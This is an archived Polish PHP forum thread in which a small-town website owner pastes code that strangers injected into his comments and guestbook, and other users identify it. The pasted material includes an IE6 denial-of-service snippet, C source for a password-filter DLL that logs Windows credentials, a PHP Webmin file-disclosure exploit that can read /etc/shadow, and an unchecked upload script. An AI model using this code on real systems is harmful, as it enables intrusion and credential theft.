Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: HACKERZY? HACK mojej strony !
Forum PHP.pl > Forum > PHP
mThW
Witam exclamation.gif!

Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:

  1. <!-- 
  2. # Internet Explorer <= 6 DoS vulnerability 
  3. # tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng) 
  4. # all versions are vulnerable 
  5. # ie 7 (beta 2 and 3) are not affected 
  6. # this malicious css code freezes/ dos the internet explorer 
  7. # prior version 7 and stops any user interaction 
  8. # the absolute size of the div element does not matter but has 
  9. # to be higher than the input's one 
  10. # 07/14/2006 by jonasschaub at gmail.com 
  11. # <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a> 
  12. --> 
  13.  
  14. <style type="text/css"> 
  15.  
  16. input 
  17. width:35px; 
  18. float:left; 
  19.  
  20. </style> 
  21.  
  22. <div style="width:50px;"> 
  23. <span> 
  24. <span style="position:relative;"> 
  25. <input /> 
  26. </span> 
  27. <input /> 
  28. <input /> 
  29. </span> 
  30. </div>
  31.  
  32.  
  33. #include <windows.h> 
  34. #include <stdio.h> 
  35. #include <stdlib.h> 
  36.  
  37. struct UNI_STRING { 
  38. USHORT len; 
  39. USHORT maxlen; 
  40. WCHAR *buff; 
  41. }; 
  42.  
  43. static HANDLE fh; 
  44.  
  45. BOOLEAN __stdcall InitializeChangeNotify () 
  46. DWORD wrote; 
  47. fh = CreateFile("C:temppwdchange.out", 
  48. GENERIC_WRITE, 
  49. FILE_SHARE_READ|FILE_SHARE_WRITE, 
  50. 0, 
  51. CREATE_ALWAYS, 
  52. FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG 
  53. H, 
  54. 0); 
  55. WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0); 
  56. return TRUE; 
  57.  
  58. LONG __stdcall PasswordChangeNotify ( 
  59. struct UNI_STRING *user, 
  60. ULONG rid, 
  61. struct UNI_STRING *passwd 
  62. DWORD wrote; 
  63. WCHAR wbuf[200]; 
  64. char buf[512]; 
  65. char buf1[200]; 
  66. DWORD len; 
  67.  
  68. memcpy(wbuf, user->buff, user->len); 
  69. len = user->len/sizeof(WCHAR); 
  70. wbuf[len] = 0; 
  71. wcstombs(buf1, wbuf, 199); 
  72. sprintf(buf, "User = %s : ", buf1); 
  73. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  74.  
  75. memcpy(wbuf, passwd->buff, passwd->len); 
  76. len = passwd->len/sizeof(WCHAR); 
  77. wbuf[len] = 0; 
  78. wcstombs(buf1, wbuf, 199); 
  79. sprintf(buf, "Password = %s : ", buf1); 
  80. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  81.  
  82. sprintf(buf, "RID = %xn", rid); 
  83. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  84.  
  85. return 0L; 
  86. -----------------------end of 
  87. FPNWCLNT.c---------------------------------- 
  88. --
  89.  
  90.  
  91.  
  92. <?php 
  93. /* 
  94. Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability 
  95. Date : 2006-06-30 
  96. Patch : update to version 1.290 
  97. Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a> 
  98. Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a> 
  99. */ 
  100.  
  101. $host = $argv[1]; 
  102. $port = $argv[2]; 
  103. $http = $argv[3]; 
  104. $file = $argv[4]; 
  105. // CHECKING THE INPUT 
  106. if($host != "" && $port != "" && $http != "" && $file != "") { 
  107.  
  108.  
  109. $z = "/..%01"; 
  110. for ($i=0;$i<60;$i++) { 
  111. $z.="/..%01"; 
  112. } 
  113.  
  114. $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; 
  115.  
  116. echo "Attacking ".$host."n"; 
  117. echo "---------------------------------n"; 
  118.  
  119. // INITIALIZING CURL SESSION TO THE TARGET 
  120.  
  121. $ch = curl_init(); 
  122.  
  123. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
  124. curl_setopt($ch, CURLOPT_URL, $target); 
  125. curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); 
  126. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE 
  127. ); 
  128.  
  129. $content = curl_exec($ch); 
  130. curl_close ($ch); 
  131.  
  132. // CLOSING CURL 
  133.  
  134. // ECHOING THE CONTENT OF THE $FILE 
  135. echo $content; 
  136.  
  137. echo "---------------------------------n"; 
  138. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  139.  
  140. } else { 
  141. // IF INPUT IS NOT CORRECT DISPLAY THE README 
  142. echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILEn"; 
  143. echo "Example : php webmin.php localhost 10000 http /etc/shadown"; 
  144. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  145. } 
  146.  
  147. ?>
  148.  
  149.  
  150.  
  151. <?php 
  152. $file = $HTTP_POST_FILES["plik"]["tmp_name"]; 
  153. $zapisz_jako = $HTTP_POST_FILES["plik"]["name"]; 
  154.  
  155. if (!copy($file, $zapisz_jako)) { 
  156.  
  157. print ("Kopiowanie pliku nie powiodło się...<br>n"); 
  158.  
  159. } 
  160.  
  161. print "<BR>Nazwa pliku: ".$HTTP_POST_FILES["plik"]["name"]; 
  162.  
  163. print "<BR>Rozmiar pliku: ".$HTTP_POST_FILES["plik"]["size"]; 
  164.  
  165. print "<BR>tymczasowo: ".$HTTP_POST_FILES["plik"]["tmp_name"]; 
  166.  
  167. print "<BR>Typ przesłanego pliku: ".$HTTP_POST_FILES["plik"]["type"]; 
  168.  
  169. ?>



Moaj strona: http://www.miasto-glubczyce.info/index.php...t=&oms=news
Głowna: http://www.miasto-glubczyce.info/
http://www.miasto-glubczyce.info/?oms=ksiega_gosci
W ksiedze tez wpisano jakis kod, dlatego jest error.
HELP biggrin.gif

Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...


Dzieku z gory za analize.
Pozdrawiam
piczu
pierwszy to DoS na IE, drugi to trojan na wykrycie hasla z Windozy, trzeci to kod na dziure w Webminie i Userminie,a ostatni to przeslanie pliku na serwer. Chyba juz wiesz oco chodzi biggrin.gif
Cysiaczek
Proponuję, żebyś zabezpieczył swoje formularze tak. aby nie mozna było jak powiadsz - wklejać kodu.
Btw. Proooszeee - tylko nie hackerzy - zwykłe script-kiddie/crackerzy (nie - nie zamierzam się spierac o nazwy smile.gif
marek220
Proszę tylko nie crackerzy, to już się przyjeło dla reversowców, pozostawmy crackerów tak jak jest to obecnie rozpoznawane jako osoby piszące keygeny, patche itp, bo zaś dla nich nie będzie nazwy smile.gif
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.